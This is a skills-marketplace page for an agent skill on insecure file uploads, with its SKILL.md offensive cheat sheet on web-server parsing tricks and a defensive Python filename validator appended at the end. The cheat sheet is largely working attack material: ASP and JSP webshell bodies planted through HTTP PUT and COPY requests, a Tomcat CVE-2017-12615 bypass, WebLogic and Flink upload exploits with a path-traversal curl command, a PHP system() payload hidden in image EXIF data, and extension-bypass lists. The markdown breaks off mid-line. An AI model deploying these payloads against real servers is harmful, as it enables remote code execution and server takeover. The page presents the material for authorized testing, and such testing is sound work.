
Upload Insecure Files
Test and reason about insecure file-upload handling—including server parsing tricks and PUT-based uploads—during authorized app security reviews.
Overview
Upload Insecure Files is an agent skill for the Ship phase that catalogs insecure file-upload and server-parsing attack patterns—including IIS, Nginx, and Apache—for authorized security testing.
Install
npx skills add https://github.com/yaklang/hack-skills --skill upload-insecure-files
What is this skill?
- Web server parsing matrix: IIS directory/semicolon tricks, Nginx CGI pathinfo, Apache multi-extension and CVE-2017-15715
- .htaccess upload scenario to re-type extensions as executable handlers
- Companion depth doc to main upload-insecure-files SKILL.md with extended scenarios and real-world cases
- Documents exploitation flow from crafted filename upload through parser misconfiguration
- Covers PUT method attack angles alongside classic multipart upload abuse
- Parsing technique tables for IIS, Nginx, and Apache including CVE-2017-15715 newline bypass
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your app accepts uploads but you are unsure whether extension allowlists actually prevent code execution when the web server parses paths or handlers incorrectly.
Who is it for?
Solo founders and small teams with file-upload features who run authorized security self-assessments or bug-bounty-style staging reviews.
Skip if: Builders who only need to implement S3 presigned uploads with no security review, or any unauthorized testing on third-party properties.
When should I use this skill?
Authorized security review of file upload endpoints when extended parsing, PUT, or CVE case studies beyond the main SKILL.md are needed.
What do I get? / Deliverables
You get structured upload and parsing test scenarios—plus CVE-relevant cases—to validate storage, handler config, and filename rules on systems you are permitted to test.
- Parsing and upload test case list by server stack
- Exploitation-flow hypotheses for manual verification
Journey fit
File-upload abuse is validated in Ship when you security-test endpoints, parsers, and storage paths before exposing uploads to real users. Security subphase covers vulnerability-oriented scenarios (IIS, Nginx, Apache parsing, .htaccess, CVE cases) rather than implementing a safe upload feature in Build.
How it compares
Offensive upload and parser cheat sheet for testers—not a secure-by-default upload implementation template.
Common Questions / FAQ
Who is upload-insecure-files for?
Developers and security-minded solo builders reviewing their own upload endpoints or testers with explicit authorization on the target application.
When should I use upload-insecure-files?
In Ship security when hardening or pen-testing avatar, document, or media upload flows before launch or after parser or server config changes.
Is upload-insecure-files safe to install?
It documents attack techniques for defensive testing—review the Security Audits panel on this page and restrict use to apps and environments you control or are engaged to assess.
SKILL.md - Upload Insecure Files
# Upload Insecure Files — Extended Scenarios & Real-World Cases

> Companion to [SKILL.md](./SKILL.md). Contains parsing vulnerabilities, PUT method attacks, and CVE case studies.

---

## 1. Web Server Parsing Vulnerabilities

Parsing vulnerabilities cause web servers to execute uploaded files as code despite having "safe" extensions:

### IIS Parsing

| Technique | Example | Mechanism |
|---|---|---|
| Directory parsing | Upload to `x.asp/` directory | IIS 6 treats files in `.asp` directories as ASP |
| Semicolon truncation | `shell.asp;.jpg` | IIS 6 truncates at `;` → executes as ASP |
| Unicode space | `shell.asp%20` | IIS ignores trailing encoded space |

### Nginx Parsing (CGI misconfiguration)

```text
# Upload: avatar.jpg (containing PHP code in EXIF or appended)
# Access: /uploads/avatar.jpg/.php
# Or:     /uploads/avatar.jpg%00.php (null byte, older versions)
```

Caused by `cgi.fix_pathinfo=1` in php.ini + incorrect Nginx `location` config.

### Apache Parsing

| Technique | Example | Mechanism |
|---|---|---|
| Multiple extensions | `shell.php.jpg` | If `AddHandler php-script .php`, Apache processes `.php` anywhere in name |
| Newline bypass (CVE-2017-15715) | `shell.php\n` (`0x0A`) | `<FilesMatch>` regex uses `$` which matches before `\n` |
| `.htaccess` upload | Upload `.htaccess` with `AddType application/x-httpd-php .jpg` | All `.jpg` files execute as PHP |

### Exploitation Flow

```
1. Upload file with parsing-vulnerable name: shell.php.jpg
2. Server stores it (passes extension validation for "jpg")
3. Access the file URL
4. Web server parses it as PHP due to parsing vulnerability → RCE
```

---

## 2. PUT Method Exploitation

### IIS PUT + COPY/MOVE

IIS with WebDAV and write permissions allows uploading via PUT, then renaming:

```http
# Step 1: PUT a text file (allowed)
PUT /test.txt HTTP/1.1
Content-Type: text/plain

<%eval request("cmd")%>

# Step 2: COPY/MOVE to .asp extension
COPY /test.txt HTTP/1.1
Destination: /shell.asp

# Step 3: Access shell
GET /shell.asp?cmd=whoami
```

### Tomcat PUT (CVE-2017-12615)

When Tomcat's `readonly` parameter is `false` in `web.xml`:

```http
# Direct PUT is blocked for .jsp
PUT /shell.jsp HTTP/1.1
→ 403 Forbidden

# Bypass with trailing slash:
PUT /shell.jsp/ HTTP/1.1
Content-Type: application/octet-stream

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
→ 201 Created

# Or Windows-style:
PUT /shell.jsp::$DATA HTTP/1.1
```

---

## 3. CVE Case: WebLogic Arbitrary File Upload (CVE-2018-2894)

WebLogic's Web Service Test Page allows unauthenticated file upload:

```
# Endpoint (when test page is enabled):
/ws_utc/config.do
# Or:
/ws_utc/resources/setting/keystore

# Upload JSP webshell as a "keystore" file
# The file is stored in a web-accessible path
# Access:
/ws_utc/css/config/keystore/TIMESTAMP_FILENAME.jsp
```

---

## 4. CVE Case: Apache Flink File Upload (CVE-2020-17518)

Flink's REST API allows uploading JARs with path traversal in the filename:

```bash
# Upload with crafted filename containing path traversal:
curl -X POST http://TARGET:8081/jars/upload \
  -F 'jarfile=@shell.jar;filename=../../../../../../tmp/shell.jar'
```

---

## 5. File Upload + Parsing Vulnerability Chain

The most reliable upload-to-RCE chain combines both:

```
1. Upload: image with PHP code embedded (e.g., in EXIF Comment)
   exiftool -Comment='<?php system($_GET["c"]); ?>' photo.jpg
2. Exploit parsing vulnerability to execute as PHP:
   - Nginx:  /uploads/photo.jpg/.php
   - Apache: rename to photo.php.jpg
   - IIS:    upload to x.asp/ directory
3. Access with command parameter:
   GET /uploads/photo.jpg/.php?c=id
```

---

## 6. Extension Bypass Reference

```text
# PHP alternatives:
.php .php3 .php4 .php5 .phtml .pht .phps .phar

# ASP alternatives:
.asp .aspx .asa .cer .cdx .ashx .asmx

# JSP alternatives:
.jsp .jspx .jsw .jsv .jspf

# Case variations:
.pHp .PhP .PHP .Asp .aSp

# Double extensions:
.php.jpg .php.png .php.txt .asp;.jpg

# Null byte (le
```
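As an added, defender-side example that is not part of the skill or the yaklang/hack-skills repo: a Python filename validator that rejects every filename-level trick catalogued in sections 1 and 6 (multi-extension, semicolon, newline/NUL, case variation, `.htaccess`, NTFS stream suffix, traversal) by checking every extension component rather than only the last one, plus a request-path check that flags the Nginx `cgi.fix_pathinfo` access shape from section 1 in access logs. Function names, the executable-extension set and the allowlist are assumptions for illustration.

```python
# Extensions a web server may execute as code. Drawn from the page's Extension
# Bypass Reference (sections 1 and 6); extend for your own stack.
EXECUTABLE_EXTS = {
    "php", "php3", "php4", "php5", "phtml", "pht", "phps", "phar",
    "asp", "aspx", "asa", "cer", "cdx", "ashx", "asmx",
    "jsp", "jspx", "jsw", "jsv", "jspf",
}


def validate_upload_filename(name: str, allowed: set[str]) -> tuple[bool, str]:
    """Return (accepted, reason). Checks the whole name, not just the last
    extension, so each parser trick on the page is rejected before storage."""
    # NUL, newline (CVE-2017-15715: '$' matches before \n) and other control
    # bytes; IIS 6 truncates at ';', so that is rejected as well.
    if any(ord(c) < 0x20 or c == "\x7f" for c in name) or ";" in name:
        return False, "control character or semicolon"
    if "::$DATA" in name.upper():          # NTFS stream suffix (Tomcat PUT case)
        return False, "NTFS alternate data stream"
    if "/" in name or "\\" in name or ".." in name:  # Flink-style traversal
        return False, "path separator or traversal"
    if name.startswith(".") or name.endswith((".", " ")):
        return False, "dotfile (.htaccess) or trailing dot/space"
    parts = name.lower().split(".")        # lower-casing defeats .pHp variants
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    exts = parts[1:]
    # Apache AddHandler honours an extension anywhere in the name, so every
    # component must be non-executable and exactly one allowed one must remain.
    if any(e in EXECUTABLE_EXTS for e in exts):
        return False, f"executable extension component: {exts}"
    if len(exts) != 1 or exts[0] not in allowed:
        return False, f"extension not in allowlist: {exts}"
    return True, "ok"


def is_pathinfo_probe(request_path: str) -> bool:
    """Flag access-log paths shaped like /uploads/avatar.jpg/.php: a segment
    that already carries a file extension followed by more path, the form
    cgi.fix_pathinfo=1 abuse relies on, or a NUL / %00 inside the path."""
    path = request_path.split("?", 1)[0]
    if "\x00" in path or "%00" in path.lower():
        return True
    segments = [s for s in path.split("/") if s]
    for seg in segments[:-1]:              # every non-final segment
        base, dot, ext = seg.rpartition(".")
        # an alphanumeric, non-numeric suffix looks like a file extension
        # (v1.0-style version directories are deliberately not flagged)
        if dot and base and ext.isalnum() and not ext.isdigit():
            return True
    return False
```

Run `is_pathinfo_probe` over the request-path column of Nginx access logs for upload directories; validated filenames should still be replaced by a server-generated name at storage time, since the validator only covers the name the client supplied.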